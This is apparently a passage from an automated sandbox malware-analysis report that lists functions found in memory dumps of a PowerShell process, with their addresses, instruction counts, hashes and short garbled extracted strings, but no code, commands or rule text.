Opcode ID: e7396d4926a5324a20bd86b98510a6f1dafd294c50830465437489ad2bfb39f9
Instruction ID: cbebde63f55564cd1dff885f1f38321046e6ffc2dcf991ae4d956bf0b98de77e
Opcode Fuzzy Hash: e7396d4926a5324a20bd86b98510a6f1dafd294c50830465437489ad2bfb39f9
Instruction Fuzzy Hash: 03F0F976200600AF97209F0AD985C23FBADEFD4675719C59AE84A8B755CA71EC41CFB0

Function 02D9DE38 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac84d3d562862d87b37fc2c985d820ceea867996a047c7faf7fec2bc54d8eddc
Instruction ID: edaef8042475f71265c78a6dcd955d7f07974d4bc9656e5bef786fa2362330a0
Opcode Fuzzy Hash: ac84d3d562862d87b37fc2c985d820ceea867996a047c7faf7fec2bc54d8eddc
Instruction Fuzzy Hash: 18F058397041808FC7119B2DD4958A6BBFAEFCA21532900EEE485DB732CA61DC02CB90

Function 02D9F3D0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e82934c830b73e109396b4590f99fa801d19b60923eea471e9c75387c79aa216
Instruction ID: 1bcad44e97bdd9f86cfd9479b1b43edad85d4b097021616beacee0402b75d78c
Opcode Fuzzy Hash: e82934c830b73e109396b4590f99fa801d19b60923eea471e9c75387c79aa216
Instruction Fuzzy Hash: 6C019271D1075AEFCB04DFE4C9446EDBBB5FF99300F10472AE015A6A04EBB06696CB80

Function 02D99158 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d66fed4498b9805afe9e101725ccf9bff287ca5fd6b001384ee8693a69190be
Instruction ID: 2960d70b7fcd082c64730c60a3c87382e4006a91ff67aa20b5f24cc299adb283
Opcode Fuzzy Hash: 9d66fed4498b9805afe9e101725ccf9bff287ca5fd6b001384ee8693a69190be
Instruction Fuzzy Hash: AEF0907550A3804FD7228B7894A83DABFB1EF42310F0444AED08EC7252D7352C8ACB60

Function 02D97968 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e3fdd5428da8a9ecbc195b53ed765eb22ca0a8af27bf099a6ebc30c3c421c0
Instruction ID: 68f5caf9c2f3129300245b863639c7297c2ee3b4a22a6314a120968bdb99466f
Opcode Fuzzy Hash: 06e3fdd5428da8a9ecbc195b53ed765eb22ca0a8af27bf099a6ebc30c3c421c0
Instruction Fuzzy Hash: F2F0A7717006149FCB149B5AE844A6FB7EAEBC8771B00052DE10AD3340DF34AC05C7A0

Function 02C8D998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105076851.0000000002C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea358beaed7c484e4d2887e8d994f4d228836b128c77d5511e2b3dec2bd0d78c
Instruction ID: d67b782889af9cedaaebecada22056ebaca0ed320a01d31645dcc5c474b34c67
Opcode Fuzzy Hash: ea358beaed7c484e4d2887e8d994f4d228836b128c77d5511e2b3dec2bd0d78c
Instruction Fuzzy Hash: AEF04975104A80AFD721CF06C984D23BBBAEF85624B19C489E84A8B356CA30FC42CF60

Function 02D990E8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3db8f0210a9d7eab2f878b73ad5b8a7bf83a1402d18b98cb33902f6be6d0003
Instruction ID: e47eda0a793eff44e2f4e8c8ea90b5802e75e1410d0e310200099f718a50790d
Opcode Fuzzy Hash: f3db8f0210a9d7eab2f878b73ad5b8a7bf83a1402d18b98cb33902f6be6d0003
Instruction Fuzzy Hash: 53F02735B041045BEB00AB68C0087AF7BA6DFC1B18F1481AEC50A57385DE3A2C46CBE1

Function 02D97697 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d663e64ae64bb799a0051dd2a49ae886967a9485b434654939d593cba70f004
Instruction ID: d9f000c7c79116a16a060ad985f1e7bee4427f4d9b9668913191355cdf6e6008
Opcode Fuzzy Hash: 6d663e64ae64bb799a0051dd2a49ae886967a9485b434654939d593cba70f004
Instruction Fuzzy Hash: 3EF0A0797002448FDB10DB6DD900AAABBA6EFC8755B0541A9F909CB326DF34CC02CBE1

Function 02D9DE48 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ab2a20456a0b5118e9c143a120b83710b72e65b6d88d8ef365cefed36b84223
Instruction ID: 11b2f13481a2b8455fea3a658802885307a93c5093b21ff2692c63f8bef55cd5
Opcode Fuzzy Hash: 8ab2a20456a0b5118e9c143a120b83710b72e65b6d88d8ef365cefed36b84223
Instruction Fuzzy Hash: CFE0E5397001108F8710AB1ED498C66BBFAEFCE66572900AAF589CB335DB61EC01CB94

Function 02D9AF88 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3a74ce7663defe88110f7f187939343674965d37aa3b9bd36b2e63a104433e
Instruction ID: 33849700af5ceffa6ff125c2d3f5fee7ba2c8cd480df656c39059671a3f3b2b1
Opcode Fuzzy Hash: 4e3a74ce7663defe88110f7f187939343674965d37aa3b9bd36b2e63a104433e
Instruction Fuzzy Hash: 18E0ED2770D3D11A8B17823968505A5AF638AC352430945EBF085CF796D9564C4A8761

Function 02D98973 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77940a3079443e8fb0c9ea81b17bfa5d67cd3305769d2b214dfcd920f6c7b66d
Instruction ID: cc16d2005be2467916075e6264a34b141bf6dbdb89d4b6592e2edd1393ef4a49
Opcode Fuzzy Hash: 77940a3079443e8fb0c9ea81b17bfa5d67cd3305769d2b214dfcd920f6c7b66d
Instruction Fuzzy Hash: B8E092357052515BCF093774A00C6AE7B62EFD472AF04016ED60B87342CF750847CB95

Function 02D99168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1aea916ec5e50ced6507c8bf953825497abff21841c31c8310e139b65800949
Instruction ID: f53d1a47be929bd867a1d715f42918b1e5c552b701b48b82d3d283f475045b15
Opcode Fuzzy Hash: d1aea916ec5e50ced6507c8bf953825497abff21841c31c8310e139b65800949
Instruction Fuzzy Hash: D3F0ED70A013045BD7649B79D49C79ABBE5FB44314F00446DE55ED7341DB396881CB90

Function 02D99549 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff23d40170373c6c70ac276d3591b30f92d70629b2bfb680f8988420ac95503
Instruction ID: 630dfcd3907b3182d3f48350578f12bdec28a58f4fd181a1d78ace32ff267ed4
Opcode Fuzzy Hash: 6ff23d40170373c6c70ac276d3591b30f92d70629b2bfb680f8988420ac95503
Instruction Fuzzy Hash: 2BE0C2327420162B4FA460B915507FB45CBCFC29A5B04413DF909D7301DE54CC0187F1

Function 02D98978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f4b56848a893c0845a76dd38dbe89bfcb47c6fcc8c0a23928f5d888a853029
Instruction ID: 028e2452ee1fc1a8eb74cb487cf99b8ef2e641460f03e1a8f1a03d30413169e8
Opcode Fuzzy Hash: 67f4b56848a893c0845a76dd38dbe89bfcb47c6fcc8c0a23928f5d888a853029
Instruction Fuzzy Hash: 02E0DF3170521047CB083774A40C2AE7A66EFC4729F00002EE60A83342DF380C4287E6

Function 02D99550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627f25c58e87517cc9ece5efd1e4863c2512299cdd8fa5ef8389d24f476caf09
Instruction ID: e912c1f1279effd026a0dde00ea13f57ade4c6fd831b19af57038eebc7a48863
Opcode Fuzzy Hash: 627f25c58e87517cc9ece5efd1e4863c2512299cdd8fa5ef8389d24f476caf09
Instruction Fuzzy Hash: 9CD05E327021222B4F9460BA19107BBA1CFCEC69A5B05403EFA09D3341EE54CC0193F1

Function 02D9DCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: f95ef9b9c2a2f75b64e19cb455ebfc55ef078e56171ab927f1ad3b18f323e1d4
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 91E08631B10114978B08995DD4104EDF7AADBCD220F04807AE94AA7340DA329D15C6E1

Function 02D9DC98 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7261deba477d5471007062e43dc8ed19d91d86e1d0861b5f641a66ca92f155
Instruction ID: 9196293a272985ed1e72a3eb0e5c8a3906b660d62973a33cae49a27a38fd5c32
Opcode Fuzzy Hash: ca7261deba477d5471007062e43dc8ed19d91d86e1d0861b5f641a66ca92f155
Instruction Fuzzy Hash: 90E08C31741614078615B61EA91085FB6ABDEC8671311843EE00AC7340DF68DC06CBE5

Function 02D98739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c0a20224fbe31b85e831501d144856dfb494615932d16f8e2bc270ccb5b5789
Instruction ID: 1683c38066f605b7548f068d6ab256e20b9342843568eeb10027020959828306
Opcode Fuzzy Hash: 9c0a20224fbe31b85e831501d144856dfb494615932d16f8e2bc270ccb5b5789
Instruction Fuzzy Hash: BEE04835C09189CBCF0AABB5D4054ED7F30EF12711B0101EED55796552D631598FCF80

Function 02D98800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6beb428325e600a5127035525336a13b199f81a4e2d1db8a3fdcb7083c935492
Instruction ID: 3fe0045dca9783acedc9fc4cbbc1e4f368b6ded067439a27b0299e80e7b23248
Opcode Fuzzy Hash: 6beb428325e600a5127035525336a13b199f81a4e2d1db8a3fdcb7083c935492
Instruction Fuzzy Hash: D2E0923490D28A9FCB05DB74D08656DBFB0EF07211B04459DDC8697312E6314C49CF40

Function 02D9F460 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0cb7545b69a420ed3552bb5ddb3e926a6f49083fd888b2657e52e98d8fdcead
Instruction ID: a60db94836aeef50b05455395844893743641d3746a8b0f6644d26b0d88bf01d
Opcode Fuzzy Hash: e0cb7545b69a420ed3552bb5ddb3e926a6f49083fd888b2657e52e98d8fdcead
Instruction Fuzzy Hash: A4E01A70E4524A9E8B80DF7DC4815A9FFF0AF49210B1485AED949D6202E3318612CF81

Function 02D9F470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 2ff15c27c8e5f7173bf125f403f85a76f96a69d9fc4dc5e212d009808b983057
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 47D067B0D042099F8B80EFADC94156EFBF4EB49200F6085AA9919E7301E7329A12CBD1

Function 02D98748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376c2f31fa1de4f8f39f011c55c1a18ab05fd1a0e4e1db0c6ccb2d30ed21f365
Instruction ID: d946398e85045bc1b793764b5f42ec90513c55a961ef99629c7221638b26433f
Opcode Fuzzy Hash: 376c2f31fa1de4f8f39f011c55c1a18ab05fd1a0e4e1db0c6ccb2d30ed21f365
Instruction Fuzzy Hash: C2D06731C091098BCB08ABA4E85A4BDBB74FE15301F40416DEA1B92291EB319A9BCAC5

Function 02D98810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d012932bdf9b34062656fabc8ae3a90540b297d0a4967ae53e4c5f5ca85a033
Instruction ID: d1a4634e17af01e4685f31aabc4d7be554212e83fb652a82185697c2fd1aa474
Opcode Fuzzy Hash: 0d012932bdf9b34062656fabc8ae3a90540b297d0a4967ae53e4c5f5ca85a033
Instruction Fuzzy Hash: D6D0123490920A9F8B14DF64D44686DBBB4EB45301F00415DD94A93340EA305C41CBC1

Function 02D97932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d281f019753859f93c493bd1fbbdbd1fcb5768a0b3b7e784607f178f5dbdf2
Instruction ID: 0a753f0b673164af2c43e73af93d16177876a45c44d9a6c93031c8d8b0683ca0
Opcode Fuzzy Hash: b4d281f019753859f93c493bd1fbbdbd1fcb5768a0b3b7e784607f178f5dbdf2
Instruction Fuzzy Hash: BFD0923404D3C4AFC757ABB894948597F20AE0312431904DED8DA9F1A3C9668459CB26

Function 02D97EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac6feec49a9f44acd9c6e1b85b417e0f47b475d73d190b5dd7ea4b62fecffca
Instruction ID: a0e7b1bedb1a91274cde91fdaf77e955d5ed09fdaca12f84bcb0b0261c88c700
Opcode Fuzzy Hash: 8ac6feec49a9f44acd9c6e1b85b417e0f47b475d73d190b5dd7ea4b62fecffca
Instruction Fuzzy Hash: D8C04C1441E3D01EDF4393759C9A5827FB64D4351970A41CAD5C2DF867C958880BCBA3

Function 02D97940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4febf4dc13505071953d652ee6415ee0b211cf59a1af6aee8441272c4ef81802
Instruction ID: 762b73489af35fdb20aff0635bc12418e856355aad8fc847986a7489b60f2a6f
Opcode Fuzzy Hash: 4febf4dc13505071953d652ee6415ee0b211cf59a1af6aee8441272c4ef81802
Instruction Fuzzy Hash: 22B09230044708CFC2496F79E404814B329EB4522938004ECE90E1B2928E76E899CA45

Non-executed Functions

Function 07551BE0 Relevance: 20.4, Strings: 16, Instructions: 408COMMON

Download Yara Rule

Strings

rWl, xrefs: 07551C53
tP]q, xrefs: 07551FEB
$cJk, xrefs: 075520B4
4']q, xrefs: 07551C86
4']q, xrefs: 07551F95
tP]q, xrefs: 07551FDF
JXl, xrefs: 075520C2
84Ul, xrefs: 07551F6C
84Ul, xrefs: 07551F76
JXl, xrefs: 07552017
4']q, xrefs: 07551C92
JXl, xrefs: 07551FA1
JXl, xrefs: 0755200B
4']q, xrefs: 07551F89
JXl, xrefs: 075520CE
rWl, xrefs: 07551C5D

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: $cJk$4']q$4']q$4']q$4']q$84Ul$84Ul$tP]q$tP]q$JXl$JXl$JXl$JXl$JXl$rWl$rWl
API String ID: 0-1556771180
Opcode ID: 60bd86ed4e33140bec5be5d5fe98b337068f6197167b5dc3c792ee76755156b7
Instruction ID: c395bba029e3a260f4c092b1ad199c14c329664abf64e8f4d7ee5587b205ef0d
Opcode Fuzzy Hash: 60bd86ed4e33140bec5be5d5fe98b337068f6197167b5dc3c792ee76755156b7
Instruction Fuzzy Hash: 0ED14AB1B046098FCB258B6898607EABFF6FFC5310F1484ABCD558B255DB35C846C7A1

Function 07553678 Relevance: 8.9, Strings: 7, Instructions: 189COMMON

Download Yara Rule

Strings

4']q, xrefs: 07553722
Ml, xrefs: 0755386D
Ml, xrefs: 0755387B
$]q, xrefs: 0755382A
$]q, xrefs: 07553836
4']q, xrefs: 0755372E
$]q, xrefs: 075537FF

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$Ml$Ml
API String ID: 0-1672596896
Opcode ID: e32d1aae1b90ba95b6fd1af0642c3d208f675ca8d4c3b9cca5856ba861e4aaff
Instruction ID: ced41bc8e4829032cb58e6eac9d8c794b1c88aeabaf805bd1977a4bab1617fb3
Opcode Fuzzy Hash: e32d1aae1b90ba95b6fd1af0642c3d208f675ca8d4c3b9cca5856ba861e4aaff
Instruction Fuzzy Hash: 9A519BF17043069FDB28462888307E6BBE6BFC2698F14886BDC49CB251CB35C941C7A1

Function 02D97A21 Relevance: 6.5, Strings: 5, Instructions: 241COMMON

Download Yara Rule

Strings

tMWl, xrefs: 02D97AD4
`^q, xrefs: 02D97BA2
`^q, xrefs: 02D97B23
`^q, xrefs: 02D97CC2
`^q, xrefs: 02D97C44

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 62d8cb52b2002f3d4042f7d8086a032dab52f419a7f4155dde09ef8db1f019bb
Instruction ID: ec9369975c69aa68a30de8cc976504446ab215904e62a4d84345a2ad583680eb
Opcode Fuzzy Hash: 62d8cb52b2002f3d4042f7d8086a032dab52f419a7f4155dde09ef8db1f019bb
Instruction Fuzzy Hash: 48B19374E012099FDB54DFA9D990A9EFBF6FF88304F108629E419AB315DB34A905CF90

Function 02D97A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

tMWl, xrefs: 02D97AD4
`^q, xrefs: 02D97BA2
`^q, xrefs: 02D97B23
`^q, xrefs: 02D97CC2
`^q, xrefs: 02D97C44

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 5a8d39d6fbf1d5674ebba32aff03b5f345009e34be864de71e2f0fb49f6b92d2
Instruction ID: aaf131625d17152167f05487a3a1b3720a78cdd41b6122ada9a1c9959923d95b
Opcode Fuzzy Hash: 5a8d39d6fbf1d5674ebba32aff03b5f345009e34be864de71e2f0fb49f6b92d2
Instruction Fuzzy Hash: BBB17274E002099FDB54DFA9D990A9EFBF6FF88314F108629E419AB314DB34A945CF90

Function 02D97210 Relevance: 6.5, Strings: 5, Instructions: 219COMMON

Download Yara Rule

Strings

tMWl, xrefs: 02D97AD4
`^q, xrefs: 02D97BA2
`^q, xrefs: 02D97B23
`^q, xrefs: 02D97CC2
`^q, xrefs: 02D97C44

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 32abc6668afaa2092f1ca29949aa6e02b7d71a57df7370b34fb675491480871c
Instruction ID: 4c3dfd2496adf9bffc943d8805ccb6e2deb37143fb2dfca8c06c537eff7f82bb
Opcode Fuzzy Hash: 32abc6668afaa2092f1ca29949aa6e02b7d71a57df7370b34fb675491480871c
Instruction Fuzzy Hash: CFA17174E012099FDB54DFA9D990A9DFBF6FF88304F108629E419AB314DB34A945CF90

Function 075533D8 Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

p5Gk, xrefs: 0755344F
,SWl, xrefs: 0755345D
RWl, xrefs: 0755342B
,SWl, xrefs: 07553469

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: ,SWl$,SWl$p5Gk$RWl
API String ID: 0-4091543336
Opcode ID: 45cac85a06c9bd31d27bf3be72f83d4b374704fbbb238f1f586277d0df4eb962
Instruction ID: 186fb325153da9080a3abb3f1a604291cf095d0192d5cb62378adf3b9bc6e673
Opcode Fuzzy Hash: 45cac85a06c9bd31d27bf3be72f83d4b374704fbbb238f1f586277d0df4eb962
Instruction Fuzzy Hash: 5C4125B1B04345DFC7219B688C25BEABFE5AF82354F1484ABD84DCB252DA31C881C7A1

Function 07552272 Relevance: 5.1, Strings: 4, Instructions: 116COMMON

Download Yara Rule

Strings

JXl, xrefs: 0755229A
JXl, xrefs: 075522A4
JXl, xrefs: 0755237F
JXl, xrefs: 075523C5

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: JXl$JXl$JXl$JXl
API String ID: 0-2277789992
Opcode ID: ff34d025aa19210f647e61855c40fab90a57604094959efd7165638b41ef0201
Instruction ID: 0a5e600b74e68a766cbd6a367c679f0dbf3be6f5c6bddf5bdeb0568cfc98f417
Opcode Fuzzy Hash: ff34d025aa19210f647e61855c40fab90a57604094959efd7165638b41ef0201
Instruction Fuzzy Hash: 244125F1A0835AEFCB118F2484606E67BB5BF42310F09C4A7DC449B251C739D984CBA2

Function 07555798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 075557C6
$]q, xrefs: 075557F4
$]q, xrefs: 07555800
$]q, xrefs: 075557AA

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: d87fc9170a4d82d4181f5e74b00a7af95e0ca9abbb491d2b387f86f27732791f
Instruction ID: 6900ce4716d055c5b6b0ea96318870111896e22b8ac0f7ee415a7204ffb3f774
Opcode Fuzzy Hash: d87fc9170a4d82d4181f5e74b00a7af95e0ca9abbb491d2b387f86f27732791f
Instruction Fuzzy Hash: BF213AB1320211ABEB38557E8860B667BDBBBC0751F34882B9D05CB281FD36D8518361

Function 07552107 Relevance: 5.1, Strings: 4, Instructions: 53COMMON

Download Yara Rule

Strings

JXl, xrefs: 0755214A
$]q, xrefs: 07552172
JXl, xrefs: 07552156
$]q, xrefs: 07552166

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$JXl$JXl
API String ID: 0-219706370
Opcode ID: 22ce8b514146e35c403f0a2e7173731ec94a166c4dec2f9f40b8e2d0b176f5d4
Instruction ID: 99ae39cd2e15832cc43f06f4fe0db97bbeff10690bdbb396a538115ffbc61986
Opcode Fuzzy Hash: 22ce8b514146e35c403f0a2e7173731ec94a166c4dec2f9f40b8e2d0b176f5d4
Instruction Fuzzy Hash: 30012BF26093815FC326062C5C305D77FAAFFD2610F1A89A7DD809F52AC6388C49C3A5

